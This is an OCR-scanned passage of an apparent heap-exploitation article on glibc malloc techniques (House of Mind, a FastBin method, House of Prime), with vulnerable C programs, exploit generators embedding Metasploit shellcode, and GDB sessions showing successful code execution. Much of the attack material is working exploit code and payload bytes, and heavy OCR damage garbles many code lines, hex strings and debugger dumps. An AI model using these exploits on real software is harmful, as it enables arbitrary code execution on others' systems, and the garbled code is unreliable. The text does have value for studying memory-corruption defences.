(SIZE_SZ<<1))) 
#define unsorted_chunks (M) (bin_at(M, 1)) 
Indeed, we see that "bin_at()" returns the address and not the value. 


Therefore another way must be taken. Bearing this in mind, we can do 
the next: 


bck = &av->bins[0]; /* Address of ... may 
fwd = bck->fd = *(&av->bins[0] + 8); /* The value of ... */ 
fwd->bk = *(&av->bins[0] + 8) + 12 = p; 


Which means that if we control the value located in: 

"Gav->bins[0] + 8" and we put there ".dtors + 4 - 12", that will be 
placed in "fwd". In the last sentence it’1l be written into DTORS_END 
the address of the second chunk "p", and continue as above. 


But we have jumped here without crossing the road full of spines. Our 
friend Phantasmal also warned us that to run this piece of code, certain 
conditions should be met. Now we will see each of them related with its 
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corresponding portion of code in the "_int_free()". 


1) The negative value of the overwritten chunk must 
be less than the value of this chunk "p". 


if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0) 
PLEASE NOTE: This must be a misinterpretation of language. To jump 
this integrity check: "-size" must be "greater" than 


the value of "p" 


2) The size of the chunk must not be less than or equal to 
av->max_fast. 


if ((unsigned long) (size) <= (unsigned long) (av->max_fast) 


We control the size of the overflow chunk so as "av->max_fast" 
which is the second field of our "fakearena". 


3) The bit IS _MMAPPED must not be set into the "size" field. 


else if (!chunk_is_mmapped(p)) { 


Also, we control the second least significant bit of the "size". 
4) The overwrited chunk can not be av->top (Wilderness chunk). 

if (__builtin_expect (p == av->top, 0)) 
5) The NONCONTIGUOUS_BIT of av->max_fast must be set. 

if (__builtin_expect (contiguous (av) 


Designer controls "av->max_fast" and know that NONCONTIGUOUS_BIT 
is "0x02" = "10b". 


6) The PREV_INUSE bit of the next chunk must be set. 


5 


if (__builtin_expect (!prev_inuse(nextchunk), 0)) 


This is the default in an allocated chunk. 


7) The size of nextchunk must be greater than 8. 


if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0) 


8) The size of nextchunk must be less than av->system_mem 


__builtin_expect (nextsize >= av->system_mem, 0) ) 


9) The PREV_INUSE bit of the chunk must not be set. 


/* consolidate backward */ 
if ('prev_inuse(p)) { 


ATTENTION: Phantasmal seems wrong here, at least according to my 
opinion, the PREV_INUSE bit of overwritten chunk, must 
be set in order to bypass this check and not unlink the 


previous chunk. 


10) The nextchunk cannot equal av->top. 
if (nextchunk != av->top) { 
If we alter all the information from "“av—->fastbins[]" to 


"av->bins[0]", then "av->top" will be overwritten and will 
be almost impossible to be equal to "nextchunk". 
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11) The PREV_INUSE bit of the chunk after nextchunk 
(nextchunk + nextsize) must be set. 


nextinuse = inuse_bit_at_offset (nextchunk, nextsize); 
/* consolidate forward */ 
if (!nextinuse) { 


The path seems long and tortuous, but it is not so much when we control 
most Situations. Let’s go to s the vulnerable program of our friend 
K-sPecial: 


/* 
* K-sPecial’s vulnerable program 


*/ 


include <stdio.h> 
include <stdlib.h> 


int main (void) { 


char *ptr = malloc(1024); /* First allocated chunk */ 
char *ptr2; /* Second chunk */ 
/* ptr & ~(HEAP_MAX_SIZE-1) = 0x08000000 */ 


int heap = (int)ptr & OxFFFO0000; 
_Bool found = 0; 


printf ("ptr found at %p\n", ptr); /* Print address of first chunk */ 


// i == 2 because this is my second chunk to allocate 
for (int i = 2; i < 1024; itt) { 
/* Allocate chunks up to 0x08100000 */ 
if (!found && (((int) (ptr2 = malloc(1024)) & OxFFFOO000) == \ 
(heap + 0x100000))) f{ 
printf("good heap allignment found on malloc() %i (%p)\n", i, ptr2); 
found = 1; /* Go out */ 
break; 


malloc(1024); /* Request another chunk: (ptr2 != av->top) */ 
/* Incorrect input: 1048576 bytes */ 
fread (ptr, 1024 * 1024, 1, stdin); 


free (ptr); /* Free first chunk */ 
free(ptr2); /* The House of Mind */ 
return (0); /* Bye */ 


Note that the input allows NULL bytes without ending our string. This 
makes our task more easy. 


The K-sPecial’s exploit create the following string: 


0x0804a008 
ton x 4] [201h x 8] [DTORS_END-12 x 246] [(409h-Ax1028) x 721] [409h] 
Sere me pao size 
[(&lst chunk + 8) x 256] [NOPx2-JUMP eee 
jepexanens ete: (0x08100298) ssi (0x081002a0) 


5 
wu 
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1) The first call to free() overwrites the first 8 bytes with garbage, 
then K-special prefer to skip this area and put into (0x08100000) 
the address of the first chunk + 8(data area) + 8 (0x0804a010). 
Here begins the fake arena structure. 


h 


2) Then comes "\x00\x00\x00\x00" that fills the "av->mutex" field. 
Other value will cause that the exploit to fail. 


3) “av->max_fast" get the value "102h". This satisfies the conditions 
2 and 5: 


(2) (size > max_fast) -> (40Dh > 102h) 
(5) "\x02" NONCONTIGUOUS_BIT is set 


4) Complete the first chunk with the DTORS_END (.dtors+4) address 
minus 8. This will overwrite &av->bins[0] + 8. 


5) Fill the nexts chunks until (0x08100000) with characters "A", while 
retaining the "size" field (409h) of each chunk. Each one has 
PREV_INUSE bit properly set. 


To reach the address of the overwritten chunk "p", we fill with 
the address where we will find our "fakearena", which is the 
a 
t 


ddress of the first chunk plus 8. The goal is jump garbage bytes 
hat will be overwritten. 


7) The “prev_size" field of "p" must be "nop; nop; jmp 0x0c;". It will 
jump to our Shellcode when DTORS_END will be executed at the end of 
he application. 


ct 


8) The "size" field of "p" must be greater than the value written in 
"av—->max_fast" and also have the NON_MAIN_ARENA bit activated 
which was the trigger for this whole story in The House of Mind. 


9) A few NOPS and then our Shellcode. 


After understanding some very solid ideas, I was really surprised when a 
simple execution of the K-sPecial’s exploit produced the following output: 


blackngel@linux:7$ ./exploit > file 
blackngel@linux:7~$ ./heapl < file 
ptr found at 0x804a008 

good heap allignment found on malloc() 724 (0x81002a0) 

*k* glibc detected *** ./heapl: double free or corruption (out): 0x081002a0 


In "malloc.c" this error corresponds to the integrity check: 
if (__builtin_expect (contiguous (av) 


Let’s go to see what happens with GDB: 


blackngel@linux:7$ gdb -q ./heapl 
(gdb) disass main 


Dump of assembler code for function main: 
0x08048513 <main+223>: call 0x804836c <free@plt> 
0x08048518 <maint228>: mov -0x10 (Sebp) , seax 
0x0804851lb <maint+231>: mov Seax, (SeESp) 
Ox080485le <maint+234>: call Ox804836c <free@plt> 
0x08048523 <maint239>: mov SOx0, eax 

0x08048528 <maint+244>: add $0x34,%esp 
0x0804852b <main+247>: pop SECX 
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0x0804852c <main+248>: pop 
0x0804852d <maint249>: lea 
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Sebp 


0x08048530 <maint252>: ret 


(gdb) 
(gdb) 


(gdb) 


Starting program: 


End of assembler dump. 


break *maint+223 
Breakpoint 1 at 0x8048513 
break *main+228 
Breakpoint 2 at 0x8048518 


run < file 


ptr found at 0x804a008 


0x4 (Secx) , Sesp 


/home/blacknge 


/* Before first cal 


/* After first call 


good heap allignment found on malloc() 724 
Breakpoint 1, 0x08048513 in main () 
Current language: auto; currently asm 
(gdb) x/16x 0x0804a008 

0x804a008: 0x41414141 0x41414141 
0x804a018: 0x00000102 0x00000102 
0x804a028: 0x00000102 0x00000102 
0x804a038: 0x08049648 0x08049648 
(gdb) c 

Continuing. 

Breakpoint 2, 0x08048518 in main () 

(gdb) x/16x 0x0804a008 

0x804a008: Oxb7£b2190 Oxb7£b2190 
0x804a018: 0x00000102 0x00000102 
0x804a028: 0x00000102 0x00000102 
0x804a038: 0x08049648 0x08049648 


When the application stopped before th 
buffer seems to be well 


But once the first call 


l/heapl < file 


(0x81002a0) 


0x00000000 
0x00000102 
0x00000102 
0x08049648 


0x00000000 
0x00000102 
0x00000102 
0x08049648 


ll to free () 


to free() 


*/ 
*/ 


0x00000102 
0x00000102 
0x08049648 
0x08049648 


0x00000000 
0x00000102 
0x08049648 
0x08049648 


first free(), we can see our 


formed: 


[A x 8] [0000] [102h x 8]. 


to free () is completed, as we said, the first 8 


bytes are trashed with memory addresses. Most surprising is that the 
memory 0x0804a0010(av) + 4, 


This position should be 


is set to zero (0x00000000). 


"av—->max_fast", which being zero and not having 


NONCONTIGUOUS_BIT bit enabled, dumps the error above. This seems happens 
with the following instructions: 


# define mutex_unlock (m) 


that is executed to the end of "_int_free()" with: 


(void *)mutex_unlock (&ar_ptr->mutex) ; 


Anyway, if someone puts a 0 for us. What happens if we do that ar_ptr 
points to 0x0804a014? 


(gdb) 


0x804a 
0x804a 
0x804a 
0x804a 


x/16x 0x08 


014: 
024: 
034: 
044: 


04a014 

// Mutex 
0x00000000 
0x00000102 
0x08049648 
0x08049648 


// max_fast ? 


0x00000102 
0x00000102 
0x08049648 
0x08049648 


0x00000102 
0x00000102 
0x08049648 
0x08049648 


0x00000102 
0x00000102 
0x08049648 
0x08049648 


So we can save 8 bytes of garbage in the exploit and the hardcoded value 


of "mu 


blackngel@mac:~$ gdb -q ./heapl 


(gdb) 


Starting program: 


tex", and leave to free 


run < file 


ptr found at 0x804a008 


Q) 


/home/blackngel/heapl < file 


to do the rest for us. 
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good heap allignment found on malloc() 724 (0x81002a0) 


Program received signal SIGSEGV, Segmentation fault. 
0x081002b2 in ?? () 
(gdb) x/16x 0x08100298 


0x8100298: 0x90900ceb 0x00000409 0x08049648 0x0804a044 
0x81002a8: 0x00000000 0x00000000 Ox5b£42474 0x5e137381 
0x81002b8: 0x83426ac9 Oxf4e2fceb Oxdb32c234 Ox6f02af0c 
0x81002c8: 0x2a8d403d Ox4202ba71 Ox2b08e636 0x10894030 
(gdb) 


It seems that the second chunk "p", again suffer the wrath of free(). 
PREV_SIZE field is OK, SIZE field is OK, but the 8 NOPS are trashed with 
two memory addresses and 8 bytes NULL. 


Note that after the call to "unsorted_chunks()", we have two sentences 
like these: 


p->bk = bck; 
p->fd = fwd; 


It is clear that both pointers are overwritten with the address of the 
previous and next chunks to our overflowed chunk "p". 


What happens if we place 16 NOPS? 
/* 


* K-sPecial exploit modified by blackngel 
*/ 


#include <stdio.h> 


/* linux_ia32_exec - CMD=/usr/bin/id Size=72 Encoder=PexFnstenvSub 
http://metasploit.com */ 

unsigned char scode[] = 
"\x31\xc9\x83\xe9\xf4\xd9\xee\xd9\x74\x%24\xf£4\x5b\x81\x73\x13\x5e" 
"\xc9\x6a\x42\x83\xeb\xfc\xe2\xf£4\x34\xc2\x32\xdb\x0c\xa£\x02\x6f£" 
"\x3d\x40\x8d\x2a\x71\xba\x02\x42\x36\xe6\x08\x2b\x30\x40\x89\x10" 
"\xb6\xc5\x6a\x42\x5e\xe6\xl£\x31\x2c\xe6\x08\x2b\x30\xe6\x03\x26" 
"\x5e\x9e\x39\xcb\xbf\x04\xea\x42"; 


int main (void) { 


int i, 3; 


for (i = 0; i < 44 / 4; itt) 

Fwrite ("\x02\x01\x00\x00", 4, 1, stdout); /* av->max_fast-12 */ 
for (i = 0; i < 984 / 4; i++) 

fwrite ("\x48\x96\x04\x08", 4, 1, stdout); /* DTORS_END - 8 x / 
for (i = 0; i < 721; i++) 

fwrite("\x09\x04\x00\x00", 4, 1, stdout); /* PRESERVE SIZE * / 

for (j = 0; j < 1028; j++) 

putchar (0x41); /* PADDING * / 


Fwrite("\x09\x04\x00\x00", 4, 1, stdout); 


For (i = 0; i < (1024 / 4); itt) 
fwrite("\x14\xa0\x04\x08", 4, 1, stdout); 


fwrite ("\xeb\x0c\x90\x90", 4, 1, stdout); /* prev_size -> jump Ox0c */ 


Fwrite ("\x0d\x04\x00\x00", 4, 1, stdout); /* size -> NON_MAIN_ ARENA */ 
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fwrite ("\x90\x90\x90\x90\x90\x90\x90\x90" \ 
"\x90\x90\x90\x90\x90\x90\x90\x90", 16, 1, stdout); /* NOPS */ 


fwrite(scode, sizeof(scode), 1, stdout); /* SHELLCODE */ 


return 0; 


blackngel@linux:7~$ ./exploit > file 
blackngel@linux:7~S ./heapl < file 
ptr found at 0x804a008 

good heap allignment found on malloc() 724 (0x81002a0) 
uid=1000(blackngel) gid=1000(blackngel) groups=4 (adm) ,20(dialout), 
24 (cdrom) ,25 (floppy) ,29 (audio) , 30 (dip) , 33 (www-data) , 44 (video) , 

46 (plugdev) , 104 (scanner) ,108 (lpadmin) , 110 (admin) ,115(netdev), 

117 (powerdev) , 1000 (blackngel) ,1001 (compiler) 

blackngel@linux:7$ 


We have succeeded! Up to this point, you could think that the first of 
conditions for The House of Mind (a piece of memory allocated in an 
address like 0x08100000) seems impossible from a practical point of view. 


But this must be considered again for two reasons: 


1) You can to allocate a big amount of memory. 
2) The user can control this amount. 


Is that true? 


Well, yes, if we go back in time. Even at the same vulnerability in 
is_modified() function of CVS. We can see the function corresponding to 
the command "entry" of that service: 


static void serve_entry (arg) 
char *arg; 


{ 


struct an_entry *p; char *cp; 


p = xmalloc (sizeof (struct an_entry)); 


cp = xmalloc (strlen (arg) + 2); strcpy (cp, arg); p->next = entries; 
p->entry = cp; 
entries = p; 


How vl4dimlir said, the heap layout will looked something like this: 


[an_entry] [buffer] [an_entry] [buffer]...[Wilderness] 


These chunks will not be free()ed until the function 

server_write_entries() is called with the "noop" command. Note that in 
addition to controlling the number of allocated chunks, you can control 
the length too. 


You can find this theory much better explained in the article "The Art of 
Exploitation: Come on back to exploit [10] published by vl4dlimlr of 
AcldBltch3z in Phrack 64. 


The old exploit used the technique unlink () to accomplish its purpose. 
This was for the glibc versions where this feature was not yet patched. 
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I’m not saying that The House of Mind is applicable to this vulnerability, 


but rather that meets certain conditions. It would be an exercise for the 


more advanced reader. 


I have checked this House in a Linux distro with GLIBC 2.8.90. 


We arrived, after a long journey, to The House of Mind. 


<< Si el unico instrumento de que s 
dispone es un martillo, todo acaba 
pareciendo un clavo. >> 


[ Lotfi Zadeh ] 


SS [-4 see FASTBIN METHOD jiHe= 


As a new technique, I established in this paper a practical solution 
"Fastbin method" in The House of Mind, which was only exposed of 
theoretical mode in the papers of Phantasmal and K-sPecial, and also 
contained certain elements which were wrongly interpreted. 


Both, K-special and Phantasmal said practically the same in their 
documents about this method. 1 


if ((unsigned long) (size) <= (unsigned long) (av->max_fast)) { 
if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 
|| __builtin_expect (chunksize (chunk_at_offset (p, size)) 
>= av->system_mem, 0) ) 
{ 
errstr = "free(): invalid next size (fast)"; 
goto errout; 
} 
set_fastchunks (av) ; 
fb = &(av->fastbins[fastbin_index(size)]); 
if (__builtin_expect (*fb == p, 0)) 
{ 
errstr = "double free or corruption (fasttop)"; 
goto errout; 
} 
printf("\nbDebug: p = O0x%x - fb = Ox%x\n", p, fb); 
p->fd = *fb; 
ee 
} 
[Sara > ] 
As this code is located after the first integrity check in "_int_free()", 


it is not. 


in Malloc Maleficarum), we know how to accomplish this. 


If we hack the "size" field of the overflowed chunk passed to free() 
sets it to 8, "fastbin_index()" returned the following value: 


to 


the main advantage is that we should not worry about the following tests. 
his may appear to be a task easier than previous method, but in reality 


he core of this technique is in place "fb" to the address of an entry of 
".dtors" or "GOT". Thanks to "The House of Prime" (first house discussed 


and 


The basic idea was to trigger following code: 
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#define fastbin_index(sz) ((((unsigned int) (sz)) >> 3) - 2) 
(8 >> 3) - 2 = -1 

Then: 
& (av->fastbins[-1]) 

And as in an arena structure (malloc_state) the previous item to 


fastbins[] matrix is "av->maxfast" (they are contiguous), the address 
where is this value will be placed in "fb". 


In "*fb = p", the content of this address will be overwritten with the 
address of the liberated chunk "p", which as before should must contain 
a "JMP" sentence to reach the Shellcode. 


Seen this, if you want to use ".dtors", you should make that "ar_ptr" 
points to ".dtors" address in "public_free()", so that this address will 
be the fakearena and "av->max_fast (av + 4)" will be equal to ".dtors + 
4". Then it will be overwritten with the address of "p" 


But to achieve this you have to go through a hard path. Let’s see the 
conditions that we must meet: 


1) The size of chunk must be less than "av->maxfast": 


if ((unsigned long) (size) <= (unsigned long) (av->max_fast) ) 


This is relatively th asiest, because we said that the size will be 
equal to "8" and "av->max_fast" will be the address of a destructor. 
It should be clear that in this case "DTORS_END" is not valid because 
it is always "\x00\x00\x00\x00" and never will be greater than "size". 
It seems then that the most effective is to make use of the Global 
Offset Table (GOT). 


We must be aware that we say that "size" must be 8, but in order to 
modify "ar_ptr", as in the previous technique, then NON_MAIN_ARENA bit 
(third least significant bit) must be set. So, I think, "size" should 
actually be: 


8 = 1000b | 100b = 4 | 8 + NON_MAIN_ARENA = 12 = [0x0c] 


With PREV_INUSE bit set: 1101b = [0x0d] 


2) The size of contiguous chunk (next chunk) to "p" must be greater 
than "8": 


__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0) 
This is no problem, right? 


3) The same chunk, at time, must be less than "av->system_mem": 


__builtin_expect (chunksize (chunk_at_offset (p, size)) >= av->system_mem, 


This is perhaps the most complicated step. Once established ar_ptr (av) 
in ".dtors" or "GOT", the "system_mem" item in "malloc_state" structure 
is beyond 1848 bytes. 


GOT is almost contiguous to DTORS. In small applications the GOT table 
also is relatively small. For this reason it is normal to find in the 
av->system_mem position a lot of zero bytes. Let’s s 


blackngel@linux:~$ objdump -s -j .dtors ./heapl 
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Contents of section .dtors: 
8049650 ffffffff 00000000 
blackngel@mac:~$ gdb -q ./heapl 
(gdb) break main 

Breakpoint 1 at 0x8048442 

(gdb) run < file 


Breakpoint 1, 0x08048442 in main () 
(gdb) x/8x 0x08049650 

0x8049650 <__DTOR_LIST__>: Oxffffffff O0x00000000 0x00000000 0x00000001 
0x8049660 <_DYNAMIC+4>: 0x00000010 0x0000000c 0x0804830c 0x0000000d 
(gdb) x/8x 0x08049650 + 1848 

0x8049d88: 0x00000000 0x00000000 0x00000000 0x00000000 
0x8049d98: 0x00000000 0x00000000 0x00000000 0x00000000 


This technique appears to be only apply to large programs. Unless, 
as Phantasmal said, we can use the stack. How? 


If "ar_ptr" is set to EBP address in a function, then "av->max_fast" 
will be EIP, which may be overwritten with the address of the chunk 
"pop", and you already know how continues. 


Here is ended the theory presented in the two mentioned papers. But 
unfortunately there is something that they forgot... at least it is 
something that quite surprised me from K-sPecial. 


We learned about the previous attack, that "av->mutex", which is the first 


item in an "arena" structure, should be equal to 0. K-special, warned us 
that otherwise, "free()" would remain in an infinite loop... 


What about DTORS then? 


",dtors" will be always "Oxffffffff", otherwise it will be a destructor 
address, but never 0. 


You can find "0x00000000" four bytes behind of .dtors, but overwrite 
"Oxffffffff" has no effect. 


What happens then with GOT? 


I do not think that you can found 0x00000000 values between each item 
within the GOT. 


Solutions? 
>From the beginning, I only explored one possible solution: 
The main goal would be to use the stack, as mentioned earlier. But the 


difference is that we should have a buffer overflow before that allow 
overwrite EBP with 0 bytes, so we have: 


EBP av->mutex = 0x00000000 


EIP = av->max_fast = &(p) 
uae) = "Jmp 0x0c" 

*p + 4 = 0x0c o Ox0d 

*p + 8 = NOPS + SHELLCODE 


But a little magic can do wonders... 


FINAL SOLUTION 
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Phantasmal and K-sPecial thought to use only "“av->maxfast" to overwrite 
then this memory location with the address of the chunk "p". 


But because we control the entire arena "av", can we afford make a new 
analysis of "fastbin_index()" for a size argument of 16 bytes: 


(16 >> 3) - 2 = 0 


So we obtain: fb = &(av->fastbins [0]), and if we get this, we can 
use the stack to overwrite EIP. How? 


If our vulnerable code is into fvuln() function, EBP and EIP will be 
pushed in the stack at the prologue, and what there is behind EBP? If no 
user data then usually you can find a "0x00000000" value. If we use 


"av—->fastbins[0]" and not "av->maxfast", we have the following: 
[ OxRAND_VAL ] <-> av + 1848 av->system_mem 
[ EIP ] <-> av->fastbins [0] 
[ EBP ] <-> av->max_fast 
<-> 


[ 0x00000000 ] av->mutex 


In "av + 1848" is normal to find addresses or random values for 
"av—->system_mem" and so we can pass the checks to reach the final 
code of "fastbin". 


The "size" field of "p" must be 16 with NON_MAIN_ARENA and PREV_INUS! 
bits enabled. Then: 


GJ 


7] 


16 = 10000 NON_MAIN_ARENA and PREV_INUSE = 101 | SIZE = 10101 = 0Ox15h 


And we can control the "size" field of the next chunk to be greater than 
"8" and less than "av->system_mem". If you look at the code above you will 
note that this field is calculated from the offset of "p", therefore, 

this field is virtually in "p + 0x15", which is an offset of 21 bytes. 


If we write a value of "0x09" in that position it will be perfect. 


But this value will be in the middle of our NOPS filler and we should make 
a small change in the "JMP" sentence in order to jump farthest. Something 
like 16 bytes will be sufficient. 


For the Proof of Concept, I modified "aircrack-2.41" adding in main() the 
following code: 


int fvuln() 


{ 
// Make something stupid here. 


} 


int main( int argc, char *argv[] ) 
{ 

PET nz (rety 

char *s, buf[128]; 

struct AP_info *ap_cur; 


fvuln(); 
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/* 
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* FastBin Method - exploit 


at 


#include <stdio.h> 


/* linux_ia32_exec - 

http://metasploit.com 
unsigned char scode[] 
"\x31\xc9\x83\xe9\xf4\xd9\xee\xd9\x74\x24\xf£4\x5b\x81\x73\x13\x5e" 
"\xc9\x6a\x42\x83\xeb\xfc\xe2\xf£4\x34\xc2\x32\xdb\x0c\xa£\x02\x6f£" 
"\x3d\x40\x8d\x2a\x71\xba\x02\x42\x36\xe6\x08\x2b\x30\x40\x89\x10" 
"\xb6\xc5\x6a\x42\x5e\xe6\xlf£\x31\x2c\xe6\x08\x2b\x30\xe6\x03\x26" 
"\x5e\x9e\x39\xcb\xbf\x04\xea\x42"; 


CMD=/usr/bin/id Size=72 


eo, 


Encoder=PexFnstenvSub 


/* FILLER 


stdout); 


stdout); /* EBP - 4 


/* JMP 0x16 


/* 16 + N_MA + P_INU 


/* nextchunk->size 


int main (void) { 
int i, 3; 
for (i = 0; i < 1028; i++) 
putchar (0x41); 
for (i = 0; i < 518; itt) { 
fwrite ("\x09\x04\x00\x00", 4, 1, 
for (j = 0; 3 < 1028; J++) 
putchar (0x41); 
} 
Fwrite ("\x09\x04\x00\x00", 4, 1, stdout); 
For (i = 0; i < (1024 / 4); itt) 
fwrite ("\x34\xf4\xff\xbf", 4, 1, 
fFwrite("\xeb\x16\x90\x90", 4, 1, stdout); 
Fwrite("\x15\x00\x00\x00", 4, 1, stdout); 
Fwrite ("\x90\x90\x90\x90" \ 
"\x90\x90\x90\x90" \ 
"\x90\x90\x90\x90" \ 
"\x09\x00\x00\x00" \ 
"\x90\x90\x90\x90", 20, 1, stdout) 
fwrite(scode, sizeof(scode), 1, stdout); 


return(0); 


lackngel@] 
: 1@1 


inux 


TOO 
ie) 
Q 
— 
i) 
Q 
0) 


lackngel@] 


(gdb) 


27S 


disass fvuln 


Dump of assembler code 


0x08049298 
0x0804929d 
0x080492a4 
0x080492a9 
0x080492ac 


<fvul 
<fvul 
<fvul 
<fvul 
<fvul 


p.ypood 5 


+184>: 
+189>: 
+196>: 
+201>: 
+204>: 


for 


call 


movl 
call 


mov 


call 


inux:7~$ gcc ploitl.c -o ploit 
./ploit > file 
inux:~$ gdb -q ./aircrack 


function fvuln: 


0x8048d4c <free@pl 


$0x8056063, (%esp) 


0x8048e8c <puts@pl 


sesi, (sesp) 


0x8048d4c <free@pl 


7’ 


/* THE MAGIC CODE 


t> 


t> 


t> 


*/ 


*/ 
*/ 


*/ 
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20 


*/ 


ey 


#7, 
ae 


0x080492b1 <fvuln+209>: movl $0x8056075, (Sesp) 

0x080492b8 <fvuln+216>: call Ox8048e8c <puts@plt> 

0x080492bd <fvuln+221>: add SOxlc, %esp 

0x080492c0 <fvuln+224>: xor Seax, eax 

0x080492c2 <fvuln+226>: pop Sebx 

0x080492c3 <fvulnt+227>: pop sesi 

0x080492c4 <fvuln+228>: pop sedi 

0x080492c5 <fvulnt229>: pop Sebp 

0x080492c6 <fvulnt+230>: ret 

End of assembler dump. 

(gdb) break *fvulnt+204 /* Before second free() 
Breakpoint 1 at 0x80492ac: file linux/aircrack.c, line 2302. 

(gdb) break *fvuln+209 /* After second free() 
Breakpoint 2 at 0x80492b1: file linux/aircrack.c, line 2303. 

(gdb) run < file 

Starting program: /home/blackngel/aircrack < file 

[Thread debugging using libthread_db enabled] 

ptr found at 0x807d008 

good heap allignment found on malloc() 521 (0x8100048) 

END fread () /* tests when free () freezing (mutex != 0) 
END first free() /* tests when free () freezing (mutex != 0) 
[New Thread Oxb7e5b6b0 (LWP 8312) ] 

[Switching to Thread Oxb7e5b6b0 (LWP 8312) ] 

Breakpoint 1, 0x080492ac in fvuln () at linux/aircrack.c:2302 
warning: Source file is more recent than executable. 

2302 free (ptr2); 

/* STACK DUMP */ 

(gdb) x/4x Oxbffff434 // av->max_fast // av->fastbins[0] 
Oxbffff434: 0x00000000 Oxbffff518 0x0804ce52 0x080483ec 
(gdb) x/x Oxbffff434 + 1848 /* av->system_mem */ 

Oxbffffb6c: 0x3d766d77 

(gdb) x/4x 0x08100048-8+20 /* nextchunk->size */ 

0x8100054: 0x00000009 0x90909090 0xe983c931 Oxd9eed9f4 

(gdb) c 

Continuing. 

Breakpoint 2, fvuln () at linux/aircrack.c:2303 

2303 printf ("\nEND second free()\n"); 

(gdb) x/4x Oxbffff434 // BIP = &(p) 

Oxbffff434: 0x00000000 Oxbffff518 0x08100040 0x080483ec 

(gdb) c 

Continuing. 

END second free() 


[New process 831 
uid=1000 (blackng 


2] 
el) 


gid=1000 (blackngel) 


groups=4 (adm) ,20(dialout), 


24 (cdrom) ,25 (floppy) ,29 (audio) , 30 (dip) , 33 (www-data) , 44 (video) , 
46 (plugdev) , 104 (scanner) ,108 (lpadmin) ,110 (admin) ,115(netdev), 
00 (blackngel) ,1001 (compiler) 


117 (powerdev) , 10 


Program exited n 


The advantage of this method is that it does not touch at any time the 
and thus we can skip some protection to BoF. 


register, 


It is also noteworthy that the two methods presented here, 


ormally. 


in The House of 
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Mind, are still applicable in the most recent versions of glibc, I have 
checked it with the latest version of GLIBC 2.8.90. 


This time we have arrived, walking with lead foot and after a long 
journey, to The House of Mind. 


<< Solo existen 10 tipos de personas: los que 
saben binario y los que no. >> 


[ XXX ] 


sao. Bel ee av->top NIGHTMAR 


GJ 


] —— — 


Once I had completed the study of The House of Mind, tracking down a 
little more code in search of other possible attack vectors, I found 
something like this at _int_free (): 


/* 
If the chunk borders the current high end of memory, 
consolidate into top 


*/ 


else { 
siz t= nextsize; 
set_head(p, size | PREV_INUS! 
av->top = p; 
check_chunk (av, p); 


Gl 
~~ 
~ 


Since we control the arena "av", we could place it in a certain location 
of the stack, such that av->top coincide exactly with a saved EIP. 


At this point, EIP would be overwritten with the address of our chunk "p" 
overflowed. Then one arbitrary code execution could be triggered. 


But my intentions were soon frustrated. To achieve execution of this code, 
in a controlled environment, we should meet one impossible condition: 


if (nextchunk != av->top) { 


} 


This only happens when the chunk "p" that will be free()ed, is contiguous 
to the highest chunk, the Wilderness. 


At some point you might think that you control the value of av->top, but 
remember that once you place av in the stack, the control is passed to 
random values in memory, and the current value of EIP never will be equal 
to "nextchunk" unless it is possible one classic stack-overflow, then I 
don’t know that you do reading this article... 


That I just want to prove, that for better or for worse, all possible ways 
should b xamined carefully. 


<< Hasta ahora las masas han ido 
Siempre tras el hechizo. >> 
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[ K. Jaspers ] 


ees 422 Sao) [ THE HOUSE OF PRIM 


] Ss 


E 


Thus seen to date, I do not want to dwell too much. The House of Prime is, 
unquestionably, one of the most elaborated techniques in Malloc 
Maleficarum . The result of a virtual adept. 


However, aS mentioned Phantasmal well, it is the least useful of all them 
at first. While bearing in mind that The House of Mind requires a chunk of 
memory located in 0x08100000, this should not be left aside. 


To perform this technique will be needed tow calls to free() over two 
chunks of memory that should be under designer’s control, and one future 
call to "malloc ()". 


The goal here, it sould be clear, it is not overwrite any memory address 
(even if it’s necessary to completion of the technique), but make that 
one call to "malloc()" returns an arbitrary memory address. Then, if we 
can control this area doing that it will fall in the stack, we could take 
total control of application. 


A final requirement is that the designer must control what is written in 
this allocated chunk, so if we put it on the stack, relatively close to 
EIP, this register can be overwritten with a arbitrary value. And you 
already know as follows... 


Let’s see a vulnerable program: 


#include <stdio.h> 
include <string.h> 
include <stdlib.h> 


void fvuln(char *strl, char *str2, int age) 


int local_age; 

char buffer[64]; 

char *ptr = malloc(1024); 
char *ptrl = malloc(1024); 
char *ptr2 = malloc(1024) 
char *ptr3; 


’ 


local_age = age; 
strncpy (buffer, strl, sizeof (buffer)-1); 


printf("\nptr found at [ %p J", ptr); 
printf("\nptrlovf found at [ %p ]", ptrl); 
printf ("\nptr2ovf found at [ Sp ]\n", ptr2); 


printf ("Enter a description: "); 
fread(ptr, 1024 * 5, 1, stdin); 


free(ptrl); 

printf ("\nEND free(1)\n"); 
free (ptr2); 
printf ("\nEND free(2)\n"); 


ptr3 = malloc(1024); 
print£("\nEND malloc()\n"); 
strncpy(ptr3, str2, 1024-1); 


10.txt Wed Apr 26 09:43:46 2017 23 


printf("Your name is %s and you are %d", buffer, local_age) ; 


} 


int main(int argc, char *argv[]) 
{ 
if(arge < 4) { 


printf("Usage: ./hop name last-name age"); 
exit (0); 

} 

fvuln(argv[1], argv[2], atoi(argv[3])); 


return 0; 


To start, we need to control the header of a first chunk that will be 
passed to free(), so that when we trigger a first call to "free()", the 
same code that in the "FastBin Method" will be used, but this time the 
size field of the chunk has to be "8", and obtain: 


fastbin_index(8) ((((unsigned int) (8)) >> 3) - 2) = -1 
Then: 
fb = &(av->fastbins[-1]) = &av—->max_fast; 
In the last sentence: (*fb = p), av-> max_fast will be overwritten with 


the address of our chunk being free()’d. 


The result is very evident, from that moment we can run the same piece of 
code in free() whenever the size of chunk that will be passed to free() 
is less than the value of the chunk address "p" previously free()/d. 


Typically: av->max_fast = 0x00000048, and now is Ox080YYYYY. What is 
more than you need. 


To pass the integrity chesks of the first free() call, we need these 
sizes: 


chunk "p" -> 8 (0x9h if PREV_INUSE bit is set). 
nextchunk -> 10h is a good value ( 8 < "0x1l0h" < av->system_mem ) 


So the exploit would start with something like this: 


int main (void) { 


int i, 3; 


for (i = 0; i < 1028; i++) /* FILLER */ 
putchar (0x41); 


fwrite ("\x09\x00\x00\x00", 4, 1, stdout); /* free(1) ptrl size */ 
fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* FILLER */ 
fwrite ("\x10\x00\x00\x00", 4, 1, stdout); /* free(1) ptr2 size */ 


